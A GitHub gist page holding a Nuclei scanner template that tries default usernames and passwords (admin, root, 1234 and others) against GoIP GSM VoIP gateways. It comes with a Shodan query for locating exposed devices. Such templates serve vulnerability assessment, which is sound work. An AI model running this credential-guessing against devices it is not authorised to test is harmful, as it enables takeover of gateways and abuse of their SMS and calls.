-
-
Save killvxk/c9abc5fbf228d0c3866b51b06a2665c0 to your computer and use it in GitHub Desktop.
Revisions
-
drfabiocastro renamed this gist
Dec 7, 2022 . 1 changed file with 0 additions and 0 deletions.There are no files selected for viewing
File renamed without changes. -
drfabiocastro created this gist
Dec 7, 2022 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,48 @@ id: goip-default-login info: name: GoIP GSM VoIP Gateway Default Password author: drfabiocastro severity: high description: GoIP GSM VoIP Gateway Default Password, Allows attackers to send, receive sms and calls. reference: - http://en.dbltek.com/ - https://medium.com/@hackatnow/how-to-create-a-python-script-to-find-goip-gsm-gateway-on-shodan-and-send-sms-ussd-via-goip-e2e203f5d339 - https://www.voip-systems.ru/assets/files/voip/voip-gsm/User_Manual_1_4_8_16.pdf metadata: shodan-query: 'HTTP/1.0 401 Please Authenticate\r\nWWW-Authenticate: Basic realm="Please Login"' tags: default-login,goip classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 requests: - raw: - | GET /default/en_US/status.html HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} payloads: username: - admin - root - sms - user password: - admin - root - 1234 attack: clusterbomb matchers-condition: and matchers: - type: word words: - "RoIP" - "GoIP" - type: status status: - 200